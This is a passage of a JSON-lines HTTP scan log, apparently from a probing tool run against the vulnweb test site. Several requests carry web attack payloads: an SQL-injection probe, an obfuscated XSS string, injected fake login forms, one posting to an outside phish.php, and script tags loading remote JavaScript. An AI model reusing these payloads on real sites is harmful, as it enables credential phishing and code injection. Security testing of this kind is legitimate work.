Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.302902669Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D8\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D8\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D8\",\"time\":\"352.504518ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.309820547Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D9\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D9\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=%2Fshowthread.asp%3Fid%3D9\",\"time\":\"352.82671ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.312944692Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=http%3A%2F%2Fwebhacking%2Ekr\",\"time\":\"340.551157ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3633,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.3247905Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp\",\"input\":\"http://testasp.vulnweb.com/Search.asp\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp\",\"time\":\"352.579417ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":319,\"lines\":44,\"status_code\":200,\"content_length\":2809,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.326156001Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Register.asp?RetURL=4290\",\"input\":\"http://testasp.vulnweb.com/Register.asp?RetURL=4290\",\"title\":\"acuforum register\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Register.asp?RetURL=4290\",\"time\":\"356.660139ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":561,\"lines\":62,\"status_code\":200,\"content_length\":3585,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.331173052Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch\",\"time\":\"345.163299ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":319,\"lines\":44,\"status_code\":200,\"content_length\":2825,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.33266956Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch\",\"time\":\"349.618676ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":319,\"lines\":44,\"status_code\":200,\"content_length\":2825,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.344436862Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%27INJECTED_PARAM\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%27INJECTED_PARAM\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%27INJECTED_PARAM\",\"time\":\"354.979114ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.344936292Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%253\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%253\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%253\",\"time\":\"356.571275ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":327,\"lines\":44,\"status_code\":200,\"content_length\":2966,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.35084238Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%25u003C%25s%25v%25g%25%20%25o%25n%25l%25o%25a%25d%25%25u003D%25a%25l%25e%25r%25t%25(%251%25)%25%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%25u003C%25s%25v%25g%25%20%25o%25n%25l%25o%25a%25d%25%25u003D%25a%25l%25e%25r%25t%25(%251%25)%25%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%25u003C%25s%25v%25g%25%20%25o%25n%25l%25o%25a%25d%25%25u003D%25a%25l%25e%25r%25t%25(%251%25)%25%3E\",\"time\":\"357.954559ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":393,\"lines\":44,\"status_code\":200,\"content_length\":4461,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.362921691Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EBitte+loggen+Sie+sich+ein+bevor+Sie++fortfahren:+%3Cform+action+%3D%22destination.aps%22%3E%3Ctable%3E+%3Ctr%3E+%3Ctd%3ELogin:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3C/td%3E+%3C/tr%3E+%3Ctr%3E+%3Ctd%3EPasswort:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3C/td%3E+%3C/tr%3E%3C/table%3E+%3Cinput+type%3Dsubmit+value%3Dlogin%3E%3C/form%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EBitte+loggen+Sie+sich+ein+bevor+Sie++fortfahren:+%3Cform+action+%3D%22destination.aps%22%3E%3Ctable%3E+%3Ctr%3E+%3Ctd%3ELogin:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3C/td%3E+%3C/tr%3E+%3Ctr%3E+%3Ctd%3EPasswort:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3C/td%3E+%3C/tr%3E%3C/table%3E+%3Cinput+type%3Dsubmit+value%3Dlogin%3E%3C/form%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EBitte+loggen+Sie+sich+ein+bevor+Sie++fortfahren:+%3Cform+action+%3D%22destination.aps%22%3E%3Ctable%3E+%3Ctr%3E+%3Ctd%3ELogin:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3C/td%3E+%3C/tr%3E+%3Ctr%3E+%3Ctd%3EPasswort:%3C/td%3E+%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3C/td%3E+%3C/tr%3E%3C/table%3E+%3Cinput+type%3Dsubmit+value%3Dlogin%3E%3C/form%3E\",\"time\":\"355.370976ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":355,\"lines\":44,\"status_code\":200,\"content_length\":4411,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.637240133Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+logi\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+logi\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+logi\",\"time\":\"356.803198ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":44,\"status_code\":200,\"content_length\":3045,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.681021266Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+\",\"time\":\"356.530453ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":330,\"lines\":44,\"status_code\":200,\"content_length\":3074,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.724989157Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C%20form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+%20length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%20%3DLOGIN%3E%3C%2Fform%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C%20form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+%20length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%20%3DLOGIN%3E%3C%2Fform%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3C%20form+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+%20length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput%20+type%3Dtext+length%3D20+name%3Dpassword%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3Cinput+type%3Dsubmit+value%20%3DLOGIN%3E%3C%2Fform%3E\",\"time\":\"356.702043ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":347,\"lines\":44,\"status_code\":200,\"content_length\":4428,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.737195263Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp\",\"time\":\"348.1126ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":335,\"lines\":44,\"status_code\":200,\"content_length\":3295,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.74321529Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2F\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2F\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2F\",\"time\":\"356.131556ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":335,\"lines\":44,\"status_code\":200,\"content_length\":3458,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:45.877869477Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%253\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%253\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%253\",\"time\":\"360.297743ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":335,\"lines\":44,\"status_code\":200,\"content_length\":3506,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.064352095Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C\",\"time\":\"360.637529ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":338,\"lines\":44,\"status_code\":200,\"content_length\":3719,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.114186537Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinp\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinp\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+the+form+below+before+proceeding%3A%3Cform+action%3D%22test.asp%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin%3A%3C%2Ftd%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3EPassword%3A%3C%2Ftd%3E%3Ctd%3E%3Cinp\",\"time\":\"360.611674ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":338,\"lines\":44,\"status_code\":200,\"content_length\":3925,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.115535895Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/cfy.js%22%3E%3C%2Fscript%3E\",\"time\":\"351.855105ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":44,\"status_code\":200,\"content_length\":3185,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.115945362Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+your+form+facebbok+below+before+proceeding:%3Cform+action%3D%22http://www.vineyarddowntown.org/pdf/phish.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C/form%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+your+form+facebbok+below+before+proceeding:%3Cform+action%3D%22http://www.vineyarddowntown.org/pdf/phish.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C/form%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cbr%3E%3Cbr%3EPlease+login+with+your+form+facebbok+below+before+proceeding:%3Cform+action%3D%22http://www.vineyarddowntown.org/pdf/phish.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3ELogin:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dlogin%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput+type%3Dtext+length%3D20+name%3Dpassword%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3Cinput+type%3Dsubmit+value%3DLOGIN%3E%3C/form%3E\",\"time\":\"357.196536ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":344,\"lines\":44,\"status_code\":200,\"content_length\":4513,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.125672665Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/nip.js%22%3E%3C%2Fscript%3E\",\"time\":\"351.899102ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":44,\"status_code\":200,\"content_length\":3185,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:16:46.129199799Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E\",\"input\":\"http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E\",\"title\":\"acuforum search\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Search.asp?tfSearch=%3Cscript%20src=%22http://sc0rn.com/sc.js%22%3E%3C%2Fscript%3E\",\"time\":\"357.281375ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 